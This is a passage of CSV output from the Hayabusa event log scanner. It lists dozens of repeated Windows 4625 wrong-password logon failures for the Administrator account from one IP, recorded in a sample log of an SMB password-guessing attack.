01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.801 